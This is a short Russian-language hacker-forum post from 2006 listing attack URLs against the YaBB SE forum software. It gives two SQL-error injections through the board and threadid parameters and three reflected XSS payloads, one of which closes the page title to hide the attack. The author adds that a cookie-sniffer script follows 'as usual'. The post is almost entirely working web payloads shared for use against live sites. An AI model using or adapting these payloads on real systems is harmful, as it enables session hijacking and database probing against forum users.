SQL Error + XSS(passive 3шт.) в YaBB SE

Discussion in 'Уязвимости' started by _kREveDKo_, 22 Apr 2006.

  1. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    YaBB SE

    http://site/forum/index.php?board='

    http://site/forum/index.php?board=1;action=display;threadid='

    http://site/forum<script>alert()</script>

    http://site/forumindex.php?board=1;action=icqpager;UIN=<script>alert()</script>

    http://site/forumindex.php?board=1;action=post;threadid=1;quote=2;title=net</title><script>alert("hacked%20by")</script>
    (меняем заголовок страницы на "net" и закрывает тэг заголовка. так мы не светимся. а дальше скрипт для сниффера - как всегда)


    Если баги не свежие, вы ребятки не кидайтесь помидорами, я не проверял багтраки... лянота =) да и модем не позволяет =)
     
    2 people like this.